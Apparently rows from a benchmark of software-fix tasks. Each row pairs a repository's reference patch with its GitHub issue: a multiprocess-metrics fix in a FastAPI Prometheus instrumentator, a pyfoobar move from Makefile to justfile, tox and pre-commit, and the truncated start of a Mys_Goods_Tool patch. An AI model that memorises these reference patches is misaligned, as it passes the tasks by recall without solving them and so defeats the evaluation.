- {file = "PyYAML-6.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f84fbc98b019fef2ee9a1cb3ce93e3187a6df0b2538a651bfb890254ba9f90b5"},
- {file = "PyYAML-6.0-cp310-cp310-win32.whl", hash = "sha256:2cd5df3de48857ed0544b34e2d40e9fac445930039f3cfe4bcc592a1f836d513"},
- {file = "PyYAML-6.0-cp310-cp310-win_amd64.whl", hash = "sha256:daf496c58a8c52083df09b80c860005194014c3698698d1a57cbcfa182142a3a"},
- {file = "PyYAML-6.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:d4b0ba9512519522b118090257be113b9468d804b19d63c71dbcf4a48fa32358"},
- {file = "PyYAML-6.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:81957921f441d50af23654aa6c5e5eaf9b06aba7f0a19c18a538dc7ef291c5a1"},
- {file = "PyYAML-6.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:afa17f5bc4d1b10afd4466fd3a44dc0e245382deca5b3c353d8b757f9e3ecb8d"},
- {file = "PyYAML-6.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:dbad0e9d368bb989f4515da330b88a057617d16b6a8245084f1b05400f24609f"},
- {file = "PyYAML-6.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:432557aa2c09802be39460360ddffd48156e30721f5e8d917f01d31694216782"},
- {file = "PyYAML-6.0-cp311-cp311-win32.whl", hash = "sha256:bfaef573a63ba8923503d27530362590ff4f576c626d86a9fed95822a8255fd7"},
- {file = "PyYAML-6.0-cp311-cp311-win_amd64.whl", hash = "sha256:01b45c0191e6d66c470b6cf1b9531a771a83c1c4208272ead47a3ae4f2f603bf"},
- {file = "PyYAML-6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:897b80890765f037df3403d22bab41627ca8811ae55e9a722fd0392850ec4d86"},
- {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50602afada6d6cbfad699b0c7bb50d5ccffa7e46a3d738092afddc1f9758427f"},
- {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:48c346915c114f5fdb3ead70312bd042a953a8ce5c7106d5bfb1a5254e47da92"},
- {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:98c4d36e99714e55cfbaaee6dd5badbc9a1ec339ebfc3b1f52e293aee6bb71a4"},
- {file = "PyYAML-6.0-cp36-cp36m-win32.whl", hash = "sha256:0283c35a6a9fbf047493e3a0ce8d79ef5030852c51e9d911a27badfde0605293"},
- {file = "PyYAML-6.0-cp36-cp36m-win_amd64.whl", hash = "sha256:07751360502caac1c067a8132d150cf3d61339af5691fe9e87803040dbc5db57"},
- {file = "PyYAML-6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:819b3830a1543db06c4d4b865e70ded25be52a2e0631ccd2f6a47a2822f2fd7c"},
- {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:473f9edb243cb1935ab5a084eb238d842fb8f404ed2193a915d1784b5a6b5fc0"},
- {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0ce82d761c532fe4ec3f87fc45688bdd3a4c1dc5e0b4a19814b9009a29baefd4"},
- {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:231710d57adfd809ef5d34183b8ed1eeae3f76459c18fb4a0b373ad56bedcdd9"},
- {file = "PyYAML-6.0-cp37-cp37m-win32.whl", hash = "sha256:c5687b8d43cf58545ade1fe3e055f70eac7a5a1a0bf42824308d868289a95737"},
- {file = "PyYAML-6.0-cp37-cp37m-win_amd64.whl", hash = "sha256:d15a181d1ecd0d4270dc32edb46f7cb7733c7c508857278d3d378d14d606db2d"},
- {file = "PyYAML-6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0b4624f379dab24d3725ffde76559cff63d9ec94e1736b556dacdfebe5ab6d4b"},
- {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:213c60cd50106436cc818accf5baa1aba61c0189ff610f64f4a3e8c6726218ba"},
- {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9fa600030013c4de8165339db93d182b9431076eb98eb40ee068700c9c813e34"},
- {file = "PyYAML-6.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:277a0ef2981ca40581a47093e9e2d13b3f1fbbeffae064c1d21bfceba2030287"},
- {file = "PyYAML-6.0-cp38-cp38-win32.whl", hash = "sha256:d4eccecf9adf6fbcc6861a38015c2a64f38b9d94838ac1810a9023a0609e1b78"},
- {file = "PyYAML-6.0-cp38-cp38-win_amd64.whl", hash = "sha256:1e4747bc279b4f613a09eb64bba2ba602d8a6664c6ce6396a4d0cd413a50ce07"},
- {file = "PyYAML-6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:055d937d65826939cb044fc8c9b08889e8c743fdc6a32b33e2390f66013e449b"},
- {file = "PyYAML-6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e61ceaab6f49fb8bdfaa0f92c4b57bcfbea54c09277b1b4f7ac376bfb7a7c174"},
- {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d839ede4ed1b28a4e8909735fc992a923cdb84e618544973d7dfc71540803"},
- {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cba8c411ef271aa037d7357a2bc8f9ee8b58b9965831d9e51baf703280dc73d3"},
- {file = "PyYAML-6.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:40527857252b61eacd1d9af500c3337ba8deb8fc298940291486c465c8b46ec0"},
- {file = "PyYAML-6.0-cp39-cp39-win32.whl", hash = "sha256:b5b9eccad747aabaaffbc6064800670f0c297e52c12754eb1d976c57e4f74dcb"},
- {file = "PyYAML-6.0-cp39-cp39-win_amd64.whl", hash = "sha256:b3d267842bf12586ba6c734f89d1f5b871df0273157918b0ccefa29deb05c21c"},
- {file = "PyYAML-6.0.tar.gz", hash = "sha256:68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"},
-]
-
[[package]]
name = "requests"
version = "2.28.2"
@@ -1019,14 +928,14 @@ doc = ["pytoolconfig[doc]", "sphinx (>=4.5.0)", "sphinx-autodoc-typehints (>=1.1
[[package]]
name = "setuptools"
-version = "67.4.0"
+version = "67.6.0"
description = "Easily download, build, install, upgrade, and uninstall Python packages"
category = "dev"
optional = false
python-versions = ">=3.7"
files = [
- {file = "setuptools-67.4.0-py3-none-any.whl", hash = "sha256:f106dee1b506dee5102cc3f3e9e68137bbad6d47b616be7991714b0c62204251"},
- {file = "setuptools-67.4.0.tar.gz", hash = "sha256:e5fd0a713141a4a105412233c63dc4e17ba0090c8e8334594ac790ec97792330"},
+ {file = "setuptools-67.6.0-py3-none-any.whl", hash = "sha256:b78aaa36f6b90a074c1fa651168723acbf45d14cb1196b6f02c0fd07f17623b2"},
+ {file = "setuptools-67.6.0.tar.gz", hash = "sha256:2ee892cd5f29f3373097f5a814697e397cf3ce313616df0af11231e2ad118077"},
]
[package.extras]
@@ -1172,28 +1081,6 @@ typing-extensions = {version = "*", markers = "python_version < \"3.8\""}
[package.extras]
standard = ["colorama (>=0.4)", "httptools (>=0.5.0)", "python-dotenv (>=0.13)", "pyyaml (>=5.1)", "uvloop (>=0.14.0,!=0.15.0,!=0.15.1)", "watchfiles (>=0.13)", "websockets (>=10.4)"]
-[[package]]
-name = "virtualenv"
-version = "20.16.2"
-description = "Virtual Python Environment builder"
-category = "dev"
-optional = false
-python-versions = ">=3.6"
-files = [
- {file = "virtualenv-20.16.2-py2.py3-none-any.whl", hash = "sha256:635b272a8e2f77cb051946f46c60a54ace3cb5e25568228bd6b57fc70eca9ff3"},
- {file = "virtualenv-20.16.2.tar.gz", hash = "sha256:0ef5be6d07181946891f5abc8047fda8bc2f0b4b9bf222c64e6e8963baee76db"},
-]
-
-[package.dependencies]
-distlib = ">=0.3.1,<1"
-filelock = ">=3.2,<4"
-importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""}
-platformdirs = ">=2,<3"
-
-[package.extras]
-docs = ["proselint (>=0.10.2)", "sphinx (>=3)", "sphinx-argparse (>=0.2.5)", "sphinx-rtd-theme (>=0.4.3)", "towncrier (>=21.3)"]
-testing = ["coverage (>=4)", "coverage-enable-subprocess (>=1)", "flaky (>=3)", "packaging (>=20.0)", "pytest (>=4)", "pytest-env (>=0.6.2)", "pytest-freezegun (>=0.4.1)", "pytest-mock (>=2)", "pytest-randomly (>=1)", "pytest-timeout (>=1)"]
-
[[package]]
name = "zipp"
version = "3.15.0"
@@ -1213,4 +1100,4 @@ testing = ["big-O", "flake8 (<5)", "jaraco.functools", "jaraco.itertools", "more
[metadata]
lock-version = "2.0"
python-versions = ">= 3.7.0, < 4.0.0"
-content-hash = "0868d18794b8cf54d229a6e87779ef8129f3b7cc2d86dea9e19f4a5d232f054c"
+content-hash = "a6fdc9d73c0e827a98d867e644f701814890de69f5499aaac9ef9120af08c410"
diff --git a/pyproject.toml b/pyproject.toml
index 0afdadf..a0c50c5 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -16,22 +16,22 @@ keywords = ["prometheus", "instrumentation", "fastapi", "exporter", "metrics"]
python = ">= 3.7.0, < 4.0.0"
fastapi = ">= 0.38.1, < 1.0.0"
prometheus-client = ">= 0.8.0, < 1.0.0"
-starlette = "0.25.0"
[tool.poetry.group.dev.dependencies]
-httpx = "^0.23.1"
-black = "^22.12.0"
+httpx = "^0.23.3"
+black = "^23.1.0"
flake8 = "^5.0.4"
-requests = "^2.28.1"
-pytest = "^7.2.0"
-pytest-cov = "^3.0.0"
-rope = "^1.6.0"
+requests = "^2.28.2"
+pytest = "^7.2.2"
+pytest-cov = "^4.0.0"
+rope = "^1.7.0"
isort = "^5.11.3"
-mypy = "^0.971"
-devtools = "^0.9.0"
-pre-commit = "^2.20.0"
-asgiref = "^3.5.2"
+mypy = "^1.1.1"
+devtools = "^0.10.0"
+asgiref = "^3.6.0"
uvicorn = "^0.20.0"
+gunicorn = "^20.1.0"
+pytest-asyncio = "^0.20.3"
[tool.black]
line-length = 90
@@ -46,3 +46,4 @@ ignore_missing_imports = true
[tool.pytest.ini_options]
norecursedirs = "tests/helpers"
markers = ["slow: mark test as slow."]
+asyncio_mode = "auto"
diff --git a/src/prometheus_fastapi_instrumentator/instrumentation.py b/src/prometheus_fastapi_instrumentator/instrumentation.py
index 2fd4cca..82a75d5 100644
--- a/src/prometheus_fastapi_instrumentator/instrumentation.py
+++ b/src/prometheus_fastapi_instrumentator/instrumentation.py
@@ -32,7 +32,7 @@ def __init__(
should_round_latency_decimals: bool = False,
should_respect_env_var: bool = False,
should_instrument_requests_inprogress: bool = False,
- excluded_handlers: List[str] = None,
+ excluded_handlers: List[str] = [],
round_latency_decimals: int = 4,
env_var_name: str = "ENABLE_METRICS",
inprogress_name: str = "http_requests_inprogress",
@@ -109,9 +109,6 @@ def __init__(
self.inprogress_name = inprogress_name
self.inprogress_labels = inprogress_labels
- if excluded_handlers is None:
- excluded_handlers = []
-
self.excluded_handlers = [re.compile(path) for path in excluded_handlers]
self.instrumentations: List[Callable[[metrics.Info], None]] = []
@@ -131,17 +128,15 @@ def __init__(
if registry:
self.registry = registry
- elif "PROMETHEUS_MULTIPROC_DIR" in os.environ:
+ else:
+ self.registry = REGISTRY
+
+ if "PROMETHEUS_MULTIPROC_DIR" in os.environ:
pmd = os.environ["PROMETHEUS_MULTIPROC_DIR"]
- if os.path.isdir(pmd):
- self.registry = CollectorRegistry()
- multiprocess.MultiProcessCollector(self.registry)
- else:
+ if not os.path.isdir(pmd):
raise ValueError(
f"Env var PROMETHEUS_MULTIPROC_DIR='{pmd}' not a directory."
)
- else:
- self.registry = REGISTRY
def instrument(
self,
@@ -255,12 +250,19 @@ def expose(
def metrics(request: Request):
"""Endpoint that serves Prometheus metrics."""
+ ephemeral_registry = self.registry
+ if "PROMETHEUS_MULTIPROC_DIR" in os.environ:
+ ephemeral_registry = CollectorRegistry()
+ multiprocess.MultiProcessCollector(ephemeral_registry)
+
if should_gzip and "gzip" in request.headers.get("Accept-Encoding", ""):
- resp = Response(content=gzip.compress(generate_latest(self.registry)))
+ resp = Response(
+ content=gzip.compress(generate_latest(ephemeral_registry))
+ )
resp.headers["Content-Type"] = CONTENT_TYPE_LATEST
resp.headers["Content-Encoding"] = "gzip"
else:
- resp = Response(content=generate_latest(self.registry))
+ resp = Response(content=generate_latest(ephemeral_registry))
resp.headers["Content-Type"] = CONTENT_TYPE_LATEST
return resp
| Multi process mode does not work as expected
The way `expose` currently works does not follow the documentation of the Prometheus client library.
Cannot see multiprocess metrics on the /metrics page while using multiple workers.
Basically, there are two weird things when loading the /metrics page:
1. I can see two lines of http_requests_total{handler="/metrics",method="GET",status="2xx"}, and it looks like one of them is not correct. I think this problem is related to https://github.com/trallnag/prometheus-fastapi-instrumentator/issues/50
```
# HELP http_requests_total Total number of requests by method, status and handler.
# TYPE http_requests_total counter
http_requests_total{handler="/metrics",method="GET",status="2xx"} 33.0
# HELP http_request_size_bytes Content length of incoming requests by handler. Only value of header is respected. Otherwise ignored. No percentile calculated.
# TYPE http_request_size_bytes summary
http_request_size_bytes_count{handler="/metrics"} 33.0
http_request_size_bytes_sum{handler="/metrics"} 0.0
# HELP http_response_size_bytes Content length of outgoing responses by handler. Only value of header is respected. Otherwise ignored. No percentile calculated.
# TYPE http_response_size_bytes summary
http_response_size_bytes_count{handler="/metrics"} 33.0
http_response_size_bytes_sum{handler="/metrics"} 235523.0
# HELP http_requests_total Total number of requests by method, status and handler.
# TYPE http_requests_total counter
http_requests_total{handler="/metrics",method="GET",status="2xx"} 7.0
```
2. The second strange thing is that I already provide **PROMETHEUS_MULTIPROC_DIR=/tmp/prometheus-fastapi-instrumentator/multiproc**. However, I cannot see the **multiprocess metrics** on the /metrics page.
Any feedback on whether this is already fixed, or on any alternative solution, would be appreciated.
@trallnag
|
<img width="1587" alt="image" src="https://user-images.githubusercontent.com/22557099/223348059-033aa161-05c1-48da-b830-5a08b7bc23e6.png">
I put the screenshot here to show that I already went inside the container to double-check whether PROMETHEUS_MULTIPROC_DIR was successfully created. Hope this information helps troubleshoot. | 2023-03-08T16:14:15 | 0.0 | [] | [] |
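Checking inside the container, as in the screenshot, can also be done in code; the patch adds exactly this validation at instrumentator init time. A minimal stdlib-only sketch of that check (the helper name is my own):

```python
import os
from typing import Optional


def check_multiproc_dir(env: dict) -> Optional[str]:
    # Mirror the validation in the patch: when PROMETHEUS_MULTIPROC_DIR is
    # set it must name an existing directory; otherwise fail loudly instead
    # of silently falling back to single-process metrics.
    pmd = env.get("PROMETHEUS_MULTIPROC_DIR")
    if pmd is None:
        return None
    if not os.path.isdir(pmd):
        raise ValueError(
            f"Env var PROMETHEUS_MULTIPROC_DIR='{pmd}' not a directory."
        )
    return pmd
```

Failing fast here surfaces a misconfigured deployment at startup rather than as silently missing multiprocess metrics on /metrics.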
||
nschloe/pyfoobar | nschloe__pyfoobar-15 | 1db016c755a2105fad7afdcd2087ab0a857857e5 | diff --git a/.circleci/config.yml b/.circleci/config.yml
index 111ab1b..be23eee 100644
--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -6,11 +6,8 @@ jobs:
- image: circleci/python:3
steps:
- checkout
- - run: pip3 install black flake8 isort
- # isort isn't compatible with black yet:
- # https://github.com/timothycrosley/isort/issues/694
- # https://github.com/python/black/issues/333
- # - run: isort --check -rc .
+ - run: pip install black flake8 isort
+ - run: isort --check .
- run: black --check .
- run: flake8 .
build:
@@ -18,13 +15,11 @@ jobs:
docker:
- image: circleci/python:3
steps:
- - run: pip3 install pytest pytest-cov
+ - run: pip install tox
- checkout
- - run: pip3 install .[all]
# The tests
- run:
- command: pytest --cov pyfoobar
- working_directory: test/
+ command: tox -- --cov pyfoobar --cov-report xml --cov-report term
env:
MPLBACKEND: Agg
# submit to codecov
diff --git a/.codecov.yml b/.codecov.yml
index 0421fdf..a052f98 100644
--- a/.codecov.yml
+++ b/.codecov.yml
@@ -1,7 +1,1 @@
comment: no
-# https://github.com/codecov/support/issues/396#issuecomment-300879528
-codecov:
- disable_default_path_fixes: true
-fixes:
- - ".*/dist-packages/::"
- - ".*/site-packages/::"
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 1618cd8..a471597 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -12,18 +12,12 @@ jobs:
lint:
runs-on: ubuntu-latest
steps:
- - uses: actions/setup-python@v2
- with:
- python-version: "3.x"
- - uses: actions/checkout@v2
- - name: Lint with flake8
- run: |
- pip install flake8
- flake8 .
- - name: Lint with black
- run: |
- pip install black
- black --check .
+ - name: Check out repo
+ uses: actions/checkout@v2
+ - name: Set up Python
+ uses: actions/setup-python@v2
+ - name: Run pre-commit
+ uses: pre-commit/[email protected]
build:
runs-on: ubuntu-latest
@@ -38,7 +32,7 @@ jobs:
- name: Test with tox
run: |
pip install tox
- tox
+ tox -- --cov pyfoobar --cov-report xml --cov-report term
- name: Submit to codecov
uses: codecov/codecov-action@v1
if: ${{ matrix.python-version == '3.9' }}
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
new file mode 100644
index 0000000..d9d495b
--- /dev/null
+++ b/.pre-commit-config.yaml
@@ -0,0 +1,16 @@
+repos:
+ - repo: https://github.com/PyCQA/isort
+ rev: 5.9.1
+ hooks:
+ - id: isort
+
+ - repo: https://github.com/psf/black
+ rev: 21.6b0
+ hooks:
+ - id: black
+ language_version: python3
+
+ - repo: https://gitlab.com/pycqa/flake8
+ rev: 3.9.2
+ hooks:
+ - id: flake8
diff --git a/.travis.yml b/.travis.yml
index 17cc8c5..f19fef9 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,12 +1,9 @@
language: python
python:
- - "3.6"
+ - "3.9"
-# command to install dependencies
install:
- - pip3 install .
+ - pip install tox
-# command to run tests
script:
- - cd test/
- - pytest
+ - tox
diff --git a/CODE_OF_CONDUCT.md b/CODE_OF_CONDUCT.md
index bd735ee..f0deae5 100644
--- a/CODE_OF_CONDUCT.md
+++ b/CODE_OF_CONDUCT.md
@@ -68,10 +68,10 @@ members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
-available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
+available at https://www.contributor-covenant.org/version/1/4/code-of-conduct/
[homepage]: https://www.contributor-covenant.org
For answers to common questions about this code of conduct, see
-https://www.contributor-covenant.org/faq
+https://www.contributor-covenant.org/faq/
diff --git a/Makefile b/Makefile
deleted file mode 100644
index f0ac654..0000000
--- a/Makefile
+++ /dev/null
@@ -1,34 +0,0 @@
-VERSION=$(shell python3 -c "from configparser import ConfigParser; p = ConfigParser(); p.read('setup.cfg'); print(p['metadata']['version'])")
-
-default:
- @echo "\"make publish\"?"
-
-# https://packaging.python.org/distributing/#id72
-upload:
- # Make sure we're on the main branch
- @if [ "$(shell git rev-parse --abbrev-ref HEAD)" != "main" ]; then exit 1; fi
- rm -f dist/*
- # python3 setup.py sdist bdist_wheel
- # https://stackoverflow.com/a/58756491/353337
- python3 -m build --sdist --wheel .
- twine upload dist/*
-
-tag:
- @if [ "$(shell git rev-parse --abbrev-ref HEAD)" != "main" ]; then exit 1; fi
- # Always create a github "release"; this automatically creates a Git tag, too.
- curl -H "Authorization: token `cat $(HOME)/.github-access-token`" -d '{"tag_name": "v$(VERSION)"}' https://api.github.com/repos/nschloe/pyfoobar/releases
-
-publish: tag upload
-
-clean:
- @find . | grep -E "(__pycache__|\.pyc|\.pyo$\)" | xargs rm -rf
- @rm -rf *.egg-info/ build/ dist/ MANIFEST .pytest_cache/
-
-format:
- isort -rc .
- black .
-
-lint:
- isort --check -rc .
- black --check .
- flake8 .
diff --git a/README.md b/README.md
index c08b09c..3a1ffb5 100644
--- a/README.md
+++ b/README.md
@@ -1,13 +1,13 @@
# pyfoobar
-[](https://pypi.org/project/pyfoobar)
-[](https://pypi.org/pypi/pyfoobar/)
+[](https://pypi.org/project/pyfoobar/)
+[](https://pypi.org/project/pyfoobar/)
[](https://github.com/nschloe/pyfoobar)
[](https://pypistats.org/packages/pyfoobar)
[](https://github.com/nschloe/pyfoobar/actions?query=workflow%3Aci)
-[](https://circleci.com/gh/nschloe/pyfoobar/tree/main)
-[](https://travis-ci.org/nschloe/pyfoobar)
+[](https://circleci.com/gh/nschloe/pyfoobar/tree/main)
+[](https://travis-ci.com/nschloe/pyfoobar)
[](https://codecov.io/gh/nschloe/pyfoobar)
[](https://lgtm.com/projects/g/nschloe/pyfoobar)
[](https://github.com/psf/black)
@@ -27,19 +27,18 @@ for your new Python project.
* Your package should be a **one-trick pony**. Nobody wants to install a huge toolbox if
all they need is the image converter in it.
-* After `import yourpackagename`, people should be able to call
- `yourpackagename.__version__`. This helps with debugging.
-
* Choose a **license** for your code and provide a `LICENSE[.txt]` in the root level of
your package as well as a statement in your main README.
[choosealicense.com](https://choosealicense.com/) can help you make a decision.
* Use **linting and formatting**, include those in your integration tests.
- - [black](https://github.com/python/black) is a formatter that I like because you
+ - [black](https://github.com/psf/black) is a formatter that I like because you
cannot configure it -- black is black.
- Good linters are [flake8](http://flake8.pycqa.org/en/latest/) and
[pylint](https://www.pylint.org/).
- [isort](https://pypi.org/project/isort/) sorts your imports.
+ - [pre-commit](https://pre-commit.com/) has gained some popularity. It runs your
+ linters and formatters on every commit. Not more "lint fix" commits.
* Once you have tests in order, make sure they are executed with every git push.
Popular **CI services** that run your tests are [GitHub
@@ -52,7 +51,7 @@ for your new Python project.
administrators_. Development happens in pull requests, this makes sure that nobody --
including yourself -- ever accidentally pushes something broken to main.
-* Use a tool for measuring **test coverage**. [codecov](https://codecov.io/) is one, and
+* Use a tool for measuring **test coverage**. [codecov](https://about.codecov.io/) is one, and
your CI provider submits the data to it.
* If you have CI set up, want to show test coverage, or advertise
@@ -62,36 +61,35 @@ for your new Python project.
* Include [**contributing guidelines**](CONTRIBUTING.md) and a [**code of
conduct**](CODE_OF_CONDUCT.md) (edit to add appropriate
[enforcement](CODE_OF_CONDUCT.md#enforcement) contacts or [use a
- template](https://help.github.com/en/articles/adding-a-code-of-conduct-to-your-project))
+ template](https://docs.github.com/en/communities/setting-up-your-project-for-healthy-contributions/adding-a-code-of-conduct-to-your-project))
to help foster a community.
### What you can do with this template
First run
```
-find . -type f -print0 -name "*.py" -o -name Makefile -o -name "*.yml" | xargs -0 sed -i 's/pyfoobar/your-project-name/g'
+find . -type f -print0 -name "*.py" -o -name "*.yml" | xargs -0 sed -i 's/pyfoobar/your-project-name/g'
```
-and rename the folder `pyfoobar` to customize the name.
+and rename the folder `src/pyfoobar` to customize the name.
-There is a simple `Makefile` that can help you with certain tasks:
- * Run `make format` to apply formatting.
- * Run `make lint` to check formatting and style.
- * Run `make publish` to
- - tag your project on git (`make tag`)
- - upload your package to PyPi (`make upload`)
+There is a simple [`justfile`](https://github.com/casey/just) that can help you with
+certain tasks:
+ * Run `just format` to apply formatting.
+ * Run `just lint` to check formatting and style.
+ * Run `just publish` to
+ - tag your project on git (`just tag`)
+ - upload your package to PyPi (`just upload`)
After publishing, people can install your package with
```
- pip3 install pyfoobar
+ pip install pyfoobar
```
### Testing
-
To run the pyfoobar unit tests, check out this repository and do
```
tox
```
### License
-
pyfoobar is published under the [MIT license](https://en.wikipedia.org/wiki/MIT_License).
diff --git a/justfile b/justfile
new file mode 100644
index 0000000..d8b8f7c
--- /dev/null
+++ b/justfile
@@ -0,0 +1,31 @@
+version := `python3 -c "from configparser import ConfigParser; p = ConfigParser(); p.read('setup.cfg'); print(p['metadata']['version'])"`
+name := `python3 -c "from configparser import ConfigParser; p = ConfigParser(); p.read('setup.cfg'); print(p['metadata']['name'])"`
+
+
+default:
+ @echo "\"just publish\"?"
+
+tag:
+ @if [ "$(git rev-parse --abbrev-ref HEAD)" != "main" ]; then exit 1; fi
+ curl -H "Authorization: token `cat ~/.github-access-token`" -d '{"tag_name": "{{version}}"}' https://api.github.com/repos/nschloe/{{name}}/releases
+
+upload: clean
+ @if [ "$(git rev-parse --abbrev-ref HEAD)" != "main" ]; then exit 1; fi
+ # https://stackoverflow.com/a/58756491/353337
+ python3 -m build --sdist --wheel .
+ twine upload dist/*
+
+publish: tag upload
+
+clean:
+ @find . | grep -E "(__pycache__|\.pyc|\.pyo$)" | xargs rm -rf
+ @rm -rf src/*.egg-info/ build/ dist/ .tox/
+
+format:
+ isort .
+ black .
+ blacken-docs README.md
+
+lint:
+ black --check .
+ flake8 .
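The `version :=` and `name :=` lines at the top of the justfile shell out to Python's `configparser` to read `[metadata]` from `setup.cfg`. A standalone sketch of that lookup (the `read_metadata` helper name is ours, not the project's):

```python
from configparser import ConfigParser


def read_metadata(path):
    """Return (name, version) from a setup.cfg-style [metadata] section,
    mirroring the backtick expressions at the top of the justfile."""
    parser = ConfigParser()
    parser.read(path)
    return parser["metadata"]["name"], parser["metadata"]["version"]
```

For the `setup.cfg` in this patch, this would yield `("pyfoobar", "0.0.6")`.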
diff --git a/pyproject.toml b/pyproject.toml
index 8fe2f47..3c2aae9 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,3 +1,6 @@
[build-system]
requires = ["setuptools>=42", "wheel"]
build-backend = "setuptools.build_meta"
+
+[tool.isort]
+profile = "black"
diff --git a/setup.cfg b/setup.cfg
index b91a84d..a720f98 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -1,6 +1,6 @@
[metadata]
name = pyfoobar
-version = 0.0.5
+version = 0.0.6
author = Nico Schlömer
author_email = [email protected]
description = Best practices for Python projects
@@ -16,7 +16,6 @@ project_urls =
long_description = file: README.md
long_description_content_type = text/markdown
license = MIT
-license_file = LICENSE
# See <https://pypi.org/classifiers/> for all classifiers.
classifiers =
Development Status :: 4 - Beta
@@ -32,10 +31,15 @@ classifiers =
Topic :: Utilities
[options]
+package_dir =
+ =src
packages = find:
install_requires =
importlib_metadata;python_version<"3.8"
-python_requires = >=3.5
+python_requires = >=3.6
+
+[options.packages.find]
+where=src
[options.entry_points]
console_scripts =
diff --git a/pyfoobar/__about__.py b/src/pyfoobar/__about__.py
similarity index 100%
rename from pyfoobar/__about__.py
rename to src/pyfoobar/__about__.py
diff --git a/pyfoobar/__init__.py b/src/pyfoobar/__init__.py
similarity index 100%
rename from pyfoobar/__init__.py
rename to src/pyfoobar/__init__.py
diff --git a/pyfoobar/cli.py b/src/pyfoobar/cli.py
similarity index 100%
rename from pyfoobar/cli.py
rename to src/pyfoobar/cli.py
diff --git a/pyfoobar/main.py b/src/pyfoobar/main.py
similarity index 100%
rename from pyfoobar/main.py
rename to src/pyfoobar/main.py
diff --git a/tox.ini b/tox.ini
index e98047f..42fdd9b 100644
--- a/tox.ini
+++ b/tox.ini
@@ -5,7 +5,8 @@ isolated_build = True
[testenv]
deps =
pytest
+ pytest-codeblocks
pytest-cov
extras = all
commands =
- pytest --cov {envsitepackagesdir}/pyfoobar --cov-report xml --cov-report term
+ pytest {posargs} --codeblocks
| isort upgrade
On running `make lint`
```bash
isort -rc .
Skipped 1 files
/home/rohan/anaconda3/envs/nbdev/lib/python3.8/site-packages/isort/main.py:1233: UserWarning: W0501: The following deprecated CLI flags were used and ignored: -rc!
warn(
/home/rohan/anaconda3/envs/nbdev/lib/python3.8/site-packages/isort/main.py:1237: UserWarning: W0500: Please see the 5.0.0 Upgrade guide: https://pycqa.github.io/isort/docs/upgrade_guides/5.0.0.html
warn(
```
https://pycqa.github.io/isort/docs/upgrade_guides/5.0.0.html
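The warnings above come from isort 5 dropping the deprecated `-rc`/`--recursive` flag; isort 5 recurses into directories by default, so a Makefile target of this shape only needs the path (hypothetical fragment, not a file from this repo):

```diff
 format:
-	isort -rc .
+	isort .
 	black .
```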
| 2021-08-08T15:58:43 | 0.0 | [] | [] |
|||
Ljzd-PRO/Mys_Goods_Tool | Ljzd-PRO__Mys_Goods_Tool-112 | 213d0821b434ad000a832dfbef108b89a2164fdd | diff --git a/README.md b/README.md
index 63768195..4b058521 100644
--- a/README.md
+++ b/README.md
@@ -16,10 +16,10 @@
### 更新说明
-- 修复定时兑换无效的问题
-- 修复失去网络连接的情况下会导致程序退出的Bug
-- 对于 Linux 使用 Ubuntu 20.04 进行构建,防止出现缺少 GNU libc 对应版本的问题
-- 非 Windows 系统增加 [uvloop](https://github.com/MagicStack/uvloop) 支持,提高性能
+- 修复启动后由于商品数据相关问题而导致的崩溃
+- 修复 Linux 实际不会应用 uvloop 的问题
+- 人机验证更新至
+ GT4(但实际上暂时不可用 [#105](https://github.com/Ljzd-PRO/Mys_Goods_Tool/issues/105#issuecomment-1552727784))
## 功能和特性
diff --git a/mys_goods_tool/api.py b/mys_goods_tool/api.py
